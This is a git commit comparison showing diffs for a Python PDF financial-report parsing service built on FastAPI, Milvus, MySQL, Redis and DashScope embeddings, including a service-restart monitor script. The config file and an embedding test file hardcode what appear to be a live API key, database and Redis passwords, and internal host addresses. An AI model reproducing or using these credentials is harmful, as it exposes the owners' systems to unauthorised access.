Compare commits

...

2 Commits

Author SHA1 Message Date
yeshu edbcc245a6 feat: import the new project code 2025-08-20 09:49:07 +08:00
yeshu 24764099c4 feat: clean up the workspace in preparation for importing the new code 2025-08-20 09:46:46 +08:00
52 changed files with 145232 additions and 3076 deletions

monitor_milvus.py Normal file

@@ -0,0 +1,58 @@
import socket
import subprocess
from datetime import datetime

def get_time():
    return datetime.now().strftime('%Y-%m-%d %H:%M:%S')

def check_port(host, port):
    """Return True when a TCP connection to host:port succeeds."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((host, port))  # 0 means the port is reachable
        sock.close()
        return result == 0
    except Exception as e:
        print(f"[{get_time()}] port check error: {str(e)}")
        return False

def restart_service():
    try:
        # check=True makes a non-zero exit raise CalledProcessError
        subprocess.run("bash /root/docker/milvus/standalone_embed.sh restart", shell=True, check=True)
        # argument-list form, if shell features are not needed:
        # subprocess.run(["bash", "standalone_embed.sh", "restart"], check=True)
        print(f"[{get_time()}] milvus service restarted")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] service restart failed: {str(e)}")
        return False

def restart_zzbservice():
    try:
        # run the restart with cwd set so the app starts in its own directory
        subprocess.run("nohup python3 app.py > app.log 2>&1 &",
                       shell=True, check=True, cwd="/root/pdf_parser/zzb_data_prod")
        print(f"[{get_time()}] zzb service restarted")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] zzb service restart failed: {str(e)}")
        return False

if __name__ == '__main__':
    print(f"[{get_time()}] starting the Milvus monitor")
    if not check_port("127.0.0.1", 19530):
        print("Milvus looks down, trying to restart...")
        restart_service()
    print(f"[{get_time()}] starting the zzb monitor")
    if not check_port("127.0.0.1", 8000):
        print("zzb service looks down, trying to restart...")
        restart_zzbservice()
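A quick interactive sanity check of the helper (a sketch; it assumes Milvus and the zzb app run locally on the ports used above):

# returns True when the service is reachable, False otherwise
print(check_port("127.0.0.1", 19530))   # Milvus
print(check_port("127.0.0.1", 8000))    # zzb FastAPI app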

zzb_data_prod/.DS_Store vendored Normal file

Binary file not shown.

View File

@@ -0,0 +1,99 @@
# Requires transformers>=4.51.0
import torch
import torch.nn.functional as F
from torch import Tensor
from modelscope import AutoTokenizer, AutoModel
import datetime
import time
import logging
import dashscope
from http import HTTPStatus

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

dashscope.api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'

def embed_with_str(input):
    retry = 0
    max_retry = 5
    t = 0.2
    while retry < max_retry:
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
            # the Aliyun endpoint rate-limited us: back off and retry
            logger.info(f'rate limited, retrying after {t}s')
            time.sleep(t)
            retry += 1
            t += 0.1
        else:
            logger.error(f'request failed with status code {resp.status_code}')
            return None
    logger.error('retry limit exceeded')
    return None
def last_token_pool(last_hidden_states: Tensor,
attention_mask: Tensor) -> Tensor:
left_padding = (attention_mask[:, -1].sum() == attention_mask.shape[0])
if left_padding:
return last_hidden_states[:, -1]
else:
sequence_lengths = attention_mask.sum(dim=1) - 1
batch_size = last_hidden_states.shape[0]
return last_hidden_states[torch.arange(batch_size, device=last_hidden_states.device), sequence_lengths]
def get_detailed_instruct(task_description: str, query: str) -> str:
return f'Instruct: {task_description}\nQuery:{query}'
# Each query must come with a one-sentence instruction that describes the task
task = 'Given a web search query, retrieve relevant passages that answer the query'
queries = [
get_detailed_instruct(task, 'What is the capital of China?'),
get_detailed_instruct(task, 'Explain gravity')
]
# No need to add instruction for retrieval documents
documents = [
"The capital of China is Beijing.",
"Gravity is a force that attracts two bodies towards each other. It gives weight to physical objects and is responsible for the movement of planets around the sun."
]
input_texts = queries + documents
tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B', padding_side='left')
model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B')
# We recommend enabling flash_attention_2 for better acceleration and memory saving.
# model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B', attn_implementation="flash_attention_2", torch_dtype=torch.float16).cuda()
print(datetime.datetime.now())
max_length = 8192
# Tokenize the input texts
batch_dict = tokenizer(
input_texts,
padding=True,
truncation=True,
max_length=max_length,
return_tensors="pt",
)
batch_dict.to(model.device)
outputs = model(**batch_dict)
embeddings = last_token_pool(outputs.last_hidden_state, batch_dict['attention_mask'])
# normalize embeddings
embeddings = F.normalize(embeddings, p=2, dim=1)
print(f"=========embeddings=========")
print(datetime.datetime.now())
scores = (embeddings[:2] @ embeddings[2:].T)
print(len(embeddings.tolist()[0]))
# [[0.7645568251609802, 0.14142508804798126], [0.13549736142158508, 0.5999549627304077]]
vector_obj = embed_with_str(input_texts)
vector = vector_obj.output["embeddings"][0]["embedding"]
print(len(vector))
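The two length prints presumably contrast the local Qwen3 vectors with the DashScope text_embedding_v2 vectors. A sketch of scoring the same queries and documents with the DashScope embeddings instead (assumes numpy is installed):

import numpy as np

# embed_with_str(input_texts) returns one embedding per input, in order
embs = np.array([e["embedding"] for e in vector_obj.output["embeddings"]])
embs = embs / np.linalg.norm(embs, axis=1, keepdims=True)  # L2-normalize
dashscope_scores = embs[:2] @ embs[2:].T                   # queries x documents
print(dashscope_scores.tolist())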

View File

@@ -1,9 +1,11 @@
 from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
 from config import MILVUS_CLIENT
+import time
+from datetime import datetime, timedelta
 def create_partition_by_hour(current_hour):
     # connect to the Milvus server
-    connections.connect("default",uri=MILVUS_CLIENT)
+    connections.connect(uri=MILVUS_CLIENT)
     # get the collection
     collection_name = "pdf_measure_v4"
     collection = Collection(collection_name)
@@ -32,37 +34,6 @@ def create_partition_by_hour(current_hour):
-    # data = []
-    # measure_data = {}
-    # vector = [0.61865162262130161] * 1536
-    # measure_data['vector'] = vector
-    # measure_data['table_num'] = int(2)
-    # measure_data['table_index'] = int(2)
-    # measure_data['measure_name'] = "234234"
-    # measure_data['measure_value'] = "23432"
-    # measure_data['measure_unit'] = "123423"
-    # measure_data['file_id'] = "100000"
-    #
-    # data.append(measure_data)
-    # res = client.insert(
-    #     collection_name=collection_name,
-    #     data=data,
-    #     partition_name=partition_name
-    # )
-    # filter_str = 'file_id == "'+"2122"+'"'
-    # res = client.search(
-    #     collection_name=collection_name, # Replace with the actual name of your collection
-    #     # Replace with your query vector
-    #     data=data,
-    #     limit=3, # Max. number of search results to return
-    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
-    #     output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
-    #     filter=filter_str,
-    #     partition_name=partition_name
-    # )
-    # print(f"============================={res}")

View File

@@ -14,10 +14,10 @@ import db_service
 import threading
 from Mil_unit import create_partition_by_hour
 from datetime import datetime, timedelta
+from log_config import logger
 app = FastAPI()
-cpu_count = os.cpu_count()
+cpu_count = 4
 job_queue = queue.Queue()
 # request body model
@@ -30,7 +30,7 @@ def run_job():
     if_run = True
     if job_queue.empty():
-        print(f"job_queue is empty: {file_path}")
+        logger.info(f"job_queue is empty: {file_path}")
         if_run = False
     if if_run:
@@ -43,29 +43,19 @@ def run_job():
         try:
             # download the pdf
             start_time = time.time()
-            print(f"starting the file-parsing job: {file_path}")
+            logger.info(f"starting the file-parsing job: {file_path}")
             if file_path.startswith('http'):
                 file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH)
             try:
                 file_info = pdf_title.create_text_outline(file_path,file_id)
             except Exception as e:
                 response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7})
-                print(f'job status notify url: {file_id}:{response.url}')
-                print(f'job status notify response: {file_id}:{response.text}')
-                print(f"{file_id} failed: {e}")
+                logger.info(f'job status notify url: {file_id}:{response.url}')
+                logger.info(f'job status notify response: {file_id}:{response.text}')
+                logger.info(f"{file_id} failed: {e}")
                 continue_execution = False
             if continue_execution:
-                print(cpu_count)
                 parent_table_pages = file_info['parent_table_pages']
-                print('the value of parent_table_pages is')
-                print(parent_table_pages)
-                # page_nums = [
-                #     '1-3',
-                #     '4-6',
-                # ]
-                print(cpu_count)
-                print('test')
                 page_num = file_info['page_count']
                 if page_num < cpu_count:
                     p_count = page_num
@@ -73,7 +63,6 @@ def run_job():
                     p_count = cpu_count
                 for i in range(p_count):
-                # for i in range(2):
                     page_list.append({
                         'type': 'table',
                         'page_num': file_info['split_parts']['table_split_parts'][i],
@@ -88,8 +77,8 @@ def run_job():
                 # notify that parsing has started
                 response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5})
-                print(f'pdf parse-start notify url: {file_id}:{response.url}')
-                print(f'pdf parse-start notify status: {file_id}:{response.text}')
+                logger.info(f'pdf parse-start notify url: {file_id}:{response.url}')
+                logger.info(f'pdf parse-start notify status: {file_id}:{response.text}')
                 parser_start_time = time.time()
                 processes = []
                 time_dispatch_job = time.time()
@@ -98,30 +87,27 @@ def run_job():
                     p = Process(target=main.dispatch_job, args=(job_info,))
                     processes.append(p)
                     p.start()
-                #time_dispatch_job_end = time.time()
-                #process_time = time_dispatch_job_end - time_dispatch_job
-                #db_service.process_time(file_id,'1',process_time)
-                print('waiting for all subtasks, file ID:', file_id)
+                logger.info(f'waiting for all subtasks, file ID: {file_id}')
                 for p in processes:
                     p.join()
-                print('pdf parsing subtasks finished, file ID:', file_id)
+                logger.info(f'pdf parsing subtasks finished, file ID: {file_id}')
                 time_dispatch_job_end = time.time()
                 process_time = time_dispatch_job_end - time_dispatch_job
                 db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end)
                 parser_end_time = time.time()
-                print(f"parsing job {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                logger.info(f"parsing job {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
                 # decide here whether to continue
                 if db_service.file_type_check(file_id):
-                    print("text-verification table generation already finished")
+                    logger.info(f"text-verification table generation already finished")
                 else:
                     # notify that measure extraction starts
                     response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6})
-                    print(f'measure-extraction notify url: {file_id}:{response.url}')
-                    print(f'measure-extraction notify status: {file_id}:{response.text}')
+                    logger.info(f'measure-extraction notify url: {file_id}:{response.url}')
+                    logger.info(f'measure-extraction notify status: {file_id}:{response.text}')
                     parser_start_time = time.time()
-                    print('starting table measure extraction, file ID:', file_id)
+                    logger.info(f'starting table measure extraction, file ID: {file_id}')
                     time_start = time.time()
@@ -131,6 +117,7 @@ def run_job():
                     partition_name = f"partition_{current_hour}"
                     # decide whether a new partition is needed
                     create_partition_by_hour(current_hour)
+                    time.sleep(10)
                     # check whether this is a Q3 report
                     if db_service.file_type_check_v2(file_id) == 3:
@@ -138,17 +125,17 @@ def run_job():
                         time_start_end = time.time()
                         process_time = time_start_end - time_start
                         db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('table measure extraction finished, file ID:', file_id)
+                        logger.info(f'table measure extraction finished, file ID: {file_id}')
                         parser_end_time = time.time()
-                        print(f"table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
-                        print('starting measure normalization, file ID:', file_id)
+                        logger.info(f"table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                        logger.info(f'starting measure normalization, file ID: {file_id}')
                         time_update = time.time()
                         main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
-                        print('normalization finished, file ID:', file_id)
+                        logger.info(f'normalization finished, file ID: {file_id}')
                         end_time = time.time()
-                        print(f"job {file_id} finished in {(end_time - start_time):.2f}s")
+                        logger.info(f"job {file_id} finished in {(end_time - start_time):.2f}s")
                         time_update_end = time.time()
                         process_time = time_update_end - time_update
                         db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
@@ -158,25 +145,25 @@ def run_job():
                         time_start_end = time.time()
                         process_time = time_start_end - time_start
                         db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('table measure extraction finished, file ID:', file_id)
+                        logger.info(f'table measure extraction finished, file ID: {file_id}')
                         parser_end_time = time.time()
-                        print(f"table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
-                        print('starting measure normalization, file ID:', file_id)
+                        logger.info(f"table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                        logger.info(f'starting measure normalization, file ID: {file_id}')
                         time_update = time.time()
                         main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
-                        print('normalization finished, file ID:', file_id)
+                        logger.info(f'normalization finished, file ID: {file_id}')
                         end_time = time.time()
-                        print(f"job {file_id} finished in {(end_time - start_time):.2f}s")
+                        logger.info(f"job {file_id} finished in {(end_time - start_time):.2f}s")
                         time_update_end = time.time()
                         process_time = time_update_end - time_update
                         db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
                     # notify job completion
                     response_time = time.time()
                     response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1})
-                    print(f'job status notify url: {file_id}:{response.url}')
-                    print(f'job status notify response: {file_id}:{response.text}')
+                    logger.info(f'job status notify url: {file_id}:{response.url}')
+                    logger.info(f'job status notify response: {file_id}:{response.text}')
                     response_time_end = time.time()
                     process_time = response_time_end - response_time
                     db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
@@ -191,17 +178,17 @@ def run_job():
             response_time_end = time.time()
             process_time = response_time_end - response_time
             db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
-            print(f'job status notify url: {file_id}:{response.url}')
-            print(f'job status notify response: {file_id}:{response.text}')
-            print(f"Response status code: {response.status_code}")
-            print(f"{file_id} failed: {e}")
+            logger.info(f'job status notify url: {file_id}:{response.url}')
+            logger.info(f'job status notify response: {file_id}:{response.text}')
+            logger.info(f"Response status code: {response.status_code}")
+            logger.info(f"{file_id} failed: {e}")
         finally:
-            print(f"job {file_id} finished, run status: {job_status}")
+            logger.info(f"job {file_id} finished, run status: {job_status}")
             #pdf_company_0824.name_code_fix(file_id,file_path)
             #print('company name and code fill finished')
     else:
-        print("another job is running, waiting.....")
+        logger.info(f"another job is running, waiting.....")
@@ -210,7 +197,7 @@ def parse_pdf_route(fileItem: FileItem):
         'file_path' : fileItem.file_path,
         'file_id' : fileItem.file_id
     })
-    print(f"added {fileItem.file_id} to the queue.")
+    logger.info(f"added {fileItem.file_id} to the queue.")
     threading.Thread(target=run_job, args=()).start()
@@ -221,16 +208,37 @@ app.post("/parser/start",
     summary="Parse a PDF file",
 )(parse_pdf_route)
+def get_local_ip():
+    try:
+        # create a UDP socket
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        # connect to an external address (Google's public DNS server here)
+        s.connect(("8.8.8.8", 80))
+        # the local end of the socket now carries the internal IP
+        local_ip = s.getsockname()[0]
+    except Exception as e:
+        logger.info(f"failed to get the internal IP: {e}")
+        local_ip = "127.0.0.1"  # fall back to the loopback address
+    finally:
+        s.close()  # close the socket
+    return local_ip
 # run the FastAPI app
 if __name__ == "__main__":
     # start the service on the server
-    # import uvicorn
-    # uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    import uvicorn
+    uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    try:
+        # fetch the internal IP and report the restart
+        ip = get_local_ip()
+        response = requests.get(f"/api/tenant/report/restart?address={ip}:{config.PORT}")
+    except KeyboardInterrupt:
+        logger.info("Shutdown server")
     # local debugging job
-    job_queue.put({
-        'file_path' : '3.pdf',
-        'file_id' : '2122'
-    })
-    run_job()
+    # job_queue.put({
+    #     'file_path' : '1.pdf',
+    #     'file_id' : '2122'
+    # })
+    #
+    # run_job()
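A hedged example of driving the route registered above from another process (the field names come from the FileItem payload shown in this diff; host and port assume the defaults in config.py):

import requests

resp = requests.post(
    "http://127.0.0.1:8000/parser/start",
    json={"file_path": "http://example.com/report.pdf", "file_id": "2122"},
)
print(resp.status_code, resp.text)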

Binary file not shown.

View File

@@ -1,28 +1,28 @@
-MILVUS_CLIENT='http://124.70.129.232:19530'
-#MILVUS_CLIENT='http://60.204.228.154:19530'
-MYSQL_HOST = '121.37.185.246'
+MILVUS_CLIENT='http://127.0.0.1:19530'
+MILVUS_HOST = '127.0.0.1'
+MILVUS_PORT = 19530
+MYSQL_HOST = '10.127.2.207'
 MYSQL_PORT = 3306
-MYSQL_USER = 'financial'
-MYSQL_PASSWORD = 'financial_8000'
-MYSQL_DB = 'financial_report'
-NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
-NOTIFY_ADDR_DIS = 'http://127.0.0.1:8100/api/tenant/info/notify'
-REDIS_HOST = '123.60.153.169'
+MYSQL_USER = 'financial_prod'
+MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
+MYSQL_DB = 'financial_report_test'
+NOTIFY_ADDR = 'http://10.127.2.206:8101/api/tenant/report/notify'
+FILE_PATH = '/root/pdf_parser/pdf/'
+REDIS_HOST = '10.127.2.206'
 REDIS_PORT = 6379
 REDIS_PASSWORD = 'Xgf_redis'
-FILE_PATH = '/root/pdf_parser/pdf/'
 PORT = 8000
-MEASURE_COUNT = 8
-MYSQL_HOST_APP = '121.37.185.246'
+MEASURE_COUNT = 4
+MYSQL_HOST_APP = '10.127.2.207'
 MYSQL_PORT_APP = 3306
-MYSQL_USER_APP = 'financial'
-MYSQL_PASSWORD_APP = 'financial_8000'
-MYSQL_DB_APP = 'financial_report'
+MYSQL_USER_APP = 'financial_prod'
+MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
+MYSQL_DB_APP = 'financial_report_test'
+api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
+# 'sk-3cc9e1601f654c149d2a4e99ef8a8946'
+#MYSQL_HOST_APP = '192.168.0.201'
+#MYSQL_PORT_APP = 3306
+#MYSQL_USER_APP = 'root'
+#MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
+#MYSQL_DB_APP = 'financial_report_prod'

View File

@@ -10,6 +10,9 @@ from pymilvus import MilvusClient
 import mysql.connector
 import threading
 import redis
+from log_config import logger
 measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"]
 # parse the measures extracted by the LLM and insert them into the database
@@ -133,9 +136,9 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
                 WHERE file_id = %s AND page_num = %s AND table_index = %s
             '''
             cursor.execute(update_query, (unit, file_id, page_num, table_index))
-            #print(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
+            logger.info(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
         else:
-            print(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
+            logger.info(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
     else:
         # insert a new record
         insert_query = '''
@@ -145,7 +148,7 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
         '''
         data_to_insert = (file_id, page_num, table_index, unit)
         cursor.execute(insert_query, data_to_insert)
-        #print(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
+        logger.info(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
     conn.commit()
@@ -190,6 +193,16 @@ def update_ori_measure(conn,cursor,file_id):
             and t1.file_id = '{file_id}'
             and t2.year = '{year}'
             '''.format(file_id=file_id, year=report_year)
+        select_query_first = '''
+            SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
+            FROM ori_measure_list t1
+            left join
+            measure_config_first_quarter t2
+            on t1.ori_measure_id = t2.ori_measure_id
+            where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
+            and t1.file_id = '{file_id}'
+            and t2.year = '{year}'
+            '''.format(file_id=file_id, year=report_year)
         select_query_half_year = '''
             SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
             FROM ori_measure_list t1
@@ -211,53 +224,67 @@ def update_ori_measure(conn,cursor,file_id):
             and t2.year = '{year}'
             '''.format(file_id=file_id, year=report_year)
-        if report_type == 1:
+        if report_type == 1:  # half-year report
             start_time = time.time()
             cursor.execute(select_query_half_year)
             records = cursor.fetchall()
             end_time = time.time()
-            print(f"update lookup query took {(end_time - start_time):.2f}s")
-            print(f'update_ori_measure took the half-year branch')
-        elif report_type == 3:
+            logger.info(f"update lookup query took {(end_time - start_time):.2f}s")
+            logger.info(f'update_ori_measure took the half-year branch')
+        elif report_type == 2:  # first-quarter report
+            start_time = time.time()
+            cursor.execute(select_query_first)
+            records = cursor.fetchall()
+            end_time = time.time()
+            logger.info(f"update lookup query took {(end_time - start_time):.2f}s")
+            logger.info(f'update_ori_measure took the first-quarter branch')
+        elif report_type == 3:  # third-quarter report
             start_time = time.time()
             cursor.execute(select_query_thrid)
             records = cursor.fetchall()
             end_time = time.time()
-            print(f"update lookup query took {(end_time - start_time):.2f}s")
-            print(f'update_ori_measure took the third-quarter branch')
-        else:
+            logger.info(f"update lookup query took {(end_time - start_time):.2f}s")
+            logger.info(f'update_ori_measure took the third-quarter branch')
+        else:  # annual report
             start_time = time.time()
             cursor.execute(select_query)
             records = cursor.fetchall()
             end_time = time.time()
-            print(f"update lookup query took {(end_time - start_time):.2f}s")
-            print(f'update_ori_measure took the annual-report branch')
+            logger.info(f"update lookup query took {(end_time - start_time):.2f}s")
+            logger.info(f'update_ori_measure took the annual-report branch')
         start_time = time.time()
         for record in records:
             data_to_update = (record[0], record[1], record[2], file_id)
             cursor.execute(update_query, data_to_update)
         conn.commit()
         end_time = time.time()
-        print(f"update step took {(end_time - start_time):.2f}s")
+        logger.info(f"update step took {(end_time - start_time):.2f}s")
         # update measure_list with the display measures for this file
         start_time = time.time()
         create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
-        if report_type == 0:
+        if report_type == 0:  # annual report
             insert_query = '''
                 INSERT INTO measure_list
                 (measure_id, measure_name, create_time, update_time, file_id)
                 select distinct measure_id,measure_name, %s,%s,%s from measure_config
                 where year = '{year}'
             '''.format(year=report_year)
-        elif report_type == 3:
+        elif report_type == 2:  # first-quarter report
+            insert_query = '''
+                INSERT INTO measure_list
+                (measure_id, measure_name, create_time, update_time, file_id)
+                select distinct measure_id,measure_name, %s,%s,%s from measure_config_first_quarter
+                where year = '{year}'
+            '''.format(year=report_year)
+        elif report_type == 3:  # third-quarter report
             insert_query = '''
                 INSERT INTO measure_list
                 (measure_id, measure_name, create_time, update_time, file_id)
                 select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter
                 where year = '{year}'
             '''.format(year=report_year)
-        else:
+        else:  # half-year report
             insert_query = '''
                 INSERT INTO measure_list
                 (measure_id, measure_name, create_time, update_time, file_id)
@@ -269,13 +296,13 @@ def update_ori_measure(conn,cursor,file_id):
         cursor.execute(insert_query, data_to_update)
         conn.commit()
         end_time = time.time()
-        print(f"insert step took {(end_time - start_time):.2f}s")
+        logger.info(f"insert step took {(end_time - start_time):.2f}s")
 def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,):
     create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
-    print('Run task %s (%s)...' % (record_range, os.getpid()))
-    print(f"inserting {len(records)} rows")
+    logger.info(f'Run task {record_range} ({os.getpid()})...')
+    logger.info(f"inserting {len(records)} rows")
     conn = mysql.connector.connect(
@@ -332,11 +359,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
     cursor_app.execute(select_parent_query)
     parent_records = cursor_app.fetchall()
-    #print(f"before: {parent_table_pages}")
     for parent_record in parent_records:
         parent_id = parent_record[0]
         parent_table_pages.append(int(parent_id))
-    #print(f"after: {parent_table_pages}")
     # collect the pages and table indexes hit by the table-header blacklist keywords into arrays
     table_index_array = []
@@ -348,15 +376,19 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
     measure_index_array = []
     cursor_app.execute(select_measure_index_query, (file_id,))
     measure_index_records = cursor_app.fetchall()
-    print("Executing SQL:", select_measure_index_query)
-    print("With file_id:", file_id)
+    logger.info(f"Executing SQL:{select_measure_index_query}")
+    logger.info(f"With file_id:{file_id}")
     for measure_index_record in measure_index_records:
         measure_index_array.append(measure_index_record[0])
-    print(f'blacklist values: {parent_table_pages}, {table_index_array}, plus the new {measure_index_array}')
+    logger.info(f'blacklist values: {parent_table_pages}, {table_index_array}, plus the new {measure_index_array}')
     #print(f'黑名单的值是{parent_table_pages}和{table_index_array}')
     record_start = record_range.split('-')[0]
     record_end = record_range.split('-')[1]
+    # first-quarter reports skip the table/measure blacklists
+    if str(report_type) == "2":
+        table_index_array = []
+        measure_index_array = []
     client = MilvusClient(
         uri=MILVUS_CLIENT,
     )
@@ -370,6 +402,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
         ori_measure_id = record[3]
         measure_id = record[4]
         measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id)
         measure_list = ast.literal_eval(measure_vector)
         data = [measure_list]
         filter_str = 'file_id == "'+file_id+'"'
@@ -384,9 +418,9 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
             partition_name=partition_name
         )
         # Convert the output to a formatted JSON string
-        # for i in range(len(res[0])):
         for i in range(len(res[0])):
             vector_distance = float(res[0][i]["distance"])
@@ -411,17 +445,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
             if utils.check_pdf_measure_black_list(pdf_measure):
                 continue
             if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
-            #if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
-                print(f'the third-layer rule dropped measure {pdf_measure} on page {table_num}')
+                logger.info(f'the third-layer rule dropped measure {pdf_measure} on page {table_num}')
                 continue
             if vector_distance > distance and table_num not in parent_table_pages:
                 # rule checks start here
                 # check whether the extracted measure and the report measure cover the same period
                 ori_period = utils.get_period_type(ori_measure_name, report_year)
                 pdf_period = utils.get_period_type(pdf_measure, report_year)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 1: {ori_period} vs {pdf_period}')
+                    logger.info(f'checkpoint 1: {ori_period} vs {pdf_period}')
                 if(ori_period != pdf_period):
                     continue
@@ -429,7 +464,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 start_ori_period = utils.get_start_period_type(ori_measure_name)
                 start_pdf_period = utils.get_start_period_type(pdf_measure)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 2: {start_ori_period} vs {start_pdf_period}')
+                    logger.info(f'checkpoint 2: {start_ori_period} vs {start_pdf_period}')
                 if(start_ori_period != start_pdf_period):
                     continue
@@ -437,7 +472,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 ori_season_type = utils.get_season_flag(ori_measure_name)
                 pdf_season_type = utils.get_season_flag(pdf_measure)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 3: {ori_season_type} vs {pdf_season_type}')
+                    logger.info(f'checkpoint 3: {ori_season_type} vs {pdf_season_type}')
                 if(ori_season_type != pdf_season_type):
                     continue
@@ -445,7 +480,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 ori_kf_type = utils.get_kf_flag(ori_measure_name)
                 pdf_kf_type = utils.get_kf_flag(pdf_measure)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 4: {ori_kf_type} vs {pdf_kf_type}')
+                    logger.info(f'checkpoint 4: {ori_kf_type} vs {pdf_kf_type}')
                 if(ori_kf_type != pdf_kf_type):
                     continue
@@ -453,7 +488,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 ori_type = utils.get_percent_flag(ori_measure_name)
                 pdf_type = utils.get_percent_flag(pdf_measure)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 5: {ori_type} vs {pdf_type}')
+                    logger.info(f'checkpoint 5: {ori_type} vs {pdf_type}')
                 if(ori_type != pdf_type):
                     continue
@@ -461,7 +496,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 ori_growth_type = utils.get_percent_growth(ori_measure_name)
                 pdf_growth_type = utils.get_percent_growth(pdf_measure)
                 if pdf_measure == '2023年6月30日货币资金合计':
-                    print(f'checkpoint 6: {ori_growth_type} vs {pdf_growth_type}')
+                    logger.info(f'checkpoint 6: {ori_growth_type} vs {pdf_growth_type}')
                 if(ori_growth_type != pdf_growth_type):
                     continue
@@ -531,7 +566,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 cursor.execute(insert_query, data_to_insert)
                 conn.commit()
     except Exception as e:
-        print(e)
+        logger.info(e)
     finally:
         parent_table_pages = []
         client.close()
@@ -550,6 +585,10 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
         SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config
         where year = '{year}'
     '''.format(year=report_year)
+    select_query_first_quarter = '''
+        SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
+        where year = '{year}'
+    '''.format(year=report_year)
     select_query_half_year = '''
        SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year
        where year = '{year}'
